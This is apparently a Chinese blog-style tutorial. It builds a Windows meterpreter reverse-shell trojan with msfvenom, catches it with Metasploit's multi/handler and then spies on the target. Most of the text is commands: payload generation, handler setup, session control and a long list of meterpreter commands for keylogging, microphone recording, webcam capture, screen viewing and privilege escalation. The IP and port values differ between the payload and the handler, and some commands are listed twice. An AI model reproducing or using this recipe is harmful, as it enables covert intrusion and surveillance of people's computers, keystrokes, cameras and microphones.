1安装 VMware15.5,kali系统，桥接模式

链接：https://pan.baidu.com/s/1Y3ftPnzCj0NaMQNDAhIUjw 
提取码：3k2w 

2修改sshd_config

vim /etc/ssh/sshd_config

去掉这两行注释 完成后保存 esc : wq! 重启SSH服务

/etc/init.d/ssh restart

 FinalShell链接成功，如下图

提权/查看ip

sudo su 

ifconfig

生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost="192.168.71.128" lport=5000 -f exe -o /root/payload.exe

 获取文件移动权限，将木马移动到靶机

chmod 755 /root 

运行msfconsole

 配置参数
(1)命令： use exploit/multi/handler（选择模块）
(2)命令： set payload windows/meterpreter/reverse_tcp（选择攻击模块）
(3)命令： set LhOST 192.168.32.1（填写自己主机的IP地址）
(4)命令： set lport 1111（填写刚才生成文件时的端口号）
(5)命令： show options（查看设置参数）
(6)命令： exploit -z -j（后台执行）

 查看上钩用户，找到靶机192.168.71.1

sessions

选择需要攻击的用户1  sessions -i 1

出现meterpreter表示入侵成功 

监控屏幕 run vnc -i

由于我这里是自己的虚拟机入侵自己的物理机，所以成了套娃效果

更多命令

meterpreter命令：
keyscan_start 开始捕获击键（开始键盘记录）
keyscan_dump 转储按键缓冲（下载键盘记录）
keyscan_stop 停止捕获击键（停止键盘记录）
record_mic X秒从默认的麦克风record_mic音频记录（音频录制）
webcam_chat 开始视频聊天（视频，对方会有弹窗）
webcam_list 单摄像头（查看摄像头列表）
webcam_snap 采取快照从指定的摄像头（摄像头拍摄一张照片）
webcam_stream 播放视频流从指定的摄像头（开启摄像头监控）
enumdesktops 列出所有可访问的桌面和窗口站（窗体列表）
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本